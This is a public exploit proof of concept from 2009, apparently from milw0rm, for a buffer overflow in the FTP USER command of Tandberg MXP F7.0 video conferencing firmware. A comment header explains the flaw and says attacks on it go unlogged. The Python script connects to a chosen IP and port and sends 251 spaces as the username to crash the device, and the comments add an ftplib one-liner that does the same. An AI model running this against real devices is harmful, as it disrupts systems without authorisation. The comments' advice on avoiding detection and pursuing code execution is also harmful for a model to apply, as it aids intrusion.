Tandberg MXP F7.0 (USER) Remote Buffer Overflow PoC



#########################################################################################

#                                            #
# TANDBERG BoF v0.1 - Tandberg MXP F7.0<                                                #
# Buffer Overflow Vulnerability PoC                                                     #
# By otokoyama                                                                          #
#                                                                                       #
# [+] We crash the process FtpCt00 by sending a 251 char string of /x20 commonly        #
#     known as a blank space.(very simple)                        #
# [+] The BOF happens due to the system passing all usernames:passwords to a log file.  #
#                                                                                       #
# [+] Vendor has fixed THIS in the later releases of its firmware so it is now public.  #
#                                                 #
#                                                                             #
# This is a good vuln due to the system not logging the IP address of the attacker.     #
# To be able to tell who was causing this you would need to grab a log from the FW      #
# and as TANDBERG does not provide timestamps on their endpoints pre f8.0               #
# you would need to have recieved a SNMP notification to TMS that the system rebooted   #
# and cross reference that with the IP's connecting through the firewall.            #
# This is particularily annoying due to the fact that systems reboot all the time    #
# As endusers are constantly turning them on\off                    #
# At this point the sysadmin goes "TANDBERG Can we buy an Expressway?"                #
#                                                #
# As far as it goes, creating a connectback shell would be difficult                    #
# this is mainly due to the process on the Endpoint that detects a memory mismatch      #
# and subsequently reboots the system(security measure).                                #
#                                                                                       #
# To create a successfull exploit outside of the DoS                                    #
# you would need to locate the memory address of the process that reboots the system    #
# (there might even be a fallback on that) This is generally too cumbersome as          #
# this embeded system doesn't do anything fun anyway (why would you want access)        #
#                                                                                    #
# In saying that,                                                                       #
# it would be fairly trivial to use the BoF to write something to the memory.           #
# you will notice buffer below only generates the exception 0x0200 aka Machine Check.   #
# Increasing the char sent to the unit will change that error to exception 0x1100       #
# meaning we are sending the MINIMUM required length to overflow the buffer.            #
# I have done the hardwork for you! Please email me if you get some encodes.          #
# BTW, This could be done like this:                                                    #
# from ftplib import FTP                                                                #
# ftp = FTP('ip.addr')                                                                  #
# ftp.login(' '*251)                                                                    #
# ftp.quit()....but its dirty.                                                        #
#                                                                #        
# shoutouts:mabus,gso                                                                   #
#########################################################################################

import socket
import struct
import time
import sys


buff='USER '+' '*251+'\r\n'

if len(sys.argv)!=3:
    print "\n[+] Usage: %s <ip> <port>"%sys.argv[0]
    print "[-] Example: python poc.py 192.168.1.23 23\n" 
    sys.exit(0)

try:
    
        print "[+] Connecting... %s" %sys.argv[1]
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((sys.argv[1],int(sys.argv[2])))
    print "[+] Sending data..."
    time.sleep(1.2)
    s.send(buff)
        print "[+] Deed Done"
        s.recv(1024)
    
except:
    print "[#] Unable to connect"

# milw0rm.com [2009-07-13]